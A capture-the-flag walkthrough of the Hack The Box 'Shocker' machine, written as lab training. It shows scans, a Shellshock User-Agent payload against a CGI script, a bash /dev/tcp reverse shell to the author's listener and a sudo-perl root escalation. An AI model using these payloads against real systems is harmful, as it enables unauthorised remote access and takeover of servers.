Redhalo

hack the box walkthrough – shocker machine

New walkthrough about a Hack The Box machine : Shocker. A bit old as it has been released but still fun and has been a good introduction for the shellshock vulnerability.

Let’s jump it !

enumeration

As usual we start our enumeration with a nmap command:

[email protected]:~/Documents$ nmap -sC -sV -oA nmap 10.129.56.222 -p- -Pn
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-29 10:52 EST
Nmap scan report for 10.129.56.222
Host is up (0.028s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.40 seconds

2 ports are opened : port 80/http and 2222/ssh

A quick view on the http with Firefox give us a single image:

Nothing really interresting..

Let’s have a look with dirbuster if you find something else:

At first sight, nothing else..

Let’s see with a nikto scan:

[email protected]:~/Documents$ nikto --url http://10.129.56.222
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.129.56.222
+ Target Hostname:    10.129.56.222
+ Target Port:        80
+ Start Time:         2020-11-29 11:00:09 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Server may leak inodes via ETags, header found with file /, inode: 89, size: 559ccac257884, mtime: gzip
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3233: /icons/README: Apache default file found.
+ 8725 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-11-29 11:05:06 (GMT-5) (297 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Nothing either.. Let’s remind the machine name: shocker.. shock.. shellshock ?!

Let’s do another dirbuster scan on the cgi-bin folder found previously:

Bingo ! a file user.sh has been found!

FOOTHOLD

Let’s see if it’s vunlnerable to a shellshock. I had a successfull return with a ping request.

I have ran tcpdump on my kali machine to trace received ping with the following command

[email protected]:~$ sudo tcpdump -i tun0 -n icmp

Then I edited the http request via Burpsuite to include a ping command in the http user-agent header:

() { :; }; /bin/bash -c 'ping -c 3 10.10.14.65'

and got the following result:

[email protected]:~$ sudo tcpdump -i tun0 -n icmp
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
11:59:09.780324 IP 10.129.62.249 > 10.10.14.65: ICMP echo request, id 1799, seq 1, length 64
11:59:09.780363 IP 10.10.14.65 > 10.129.62.249: ICMP echo reply, id 1799, seq 1, length 64
11:59:10.780459 IP 10.129.62.249 > 10.10.14.65: ICMP echo request, id 1799, seq 2, length 64
11:59:10.780504 IP 10.10.14.65 > 10.129.62.249: ICMP echo reply, id 1799, seq 2, length 64

Seems good to me!

After several tries, I used the following command to get a reverse shell:

() { :; }; /bin/bash -c 'bash -i >& /dev/tcp/10.10.14.65/1337 0>&1'
[email protected]:~$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.14.65] from (UNKNOWN) [10.129.62.249] 42724
bash: no job control in this shell
[email protected]:/usr/lib/cgi-bin$ whoami
whoami
shelly

PRIVILEGE ESCALATION

Then with a linpeas scan, I got the following information:


User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

seems easy then..

[email protected]:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo perl -e 'exec "/bin/sh";'
whoami
root

And we are root!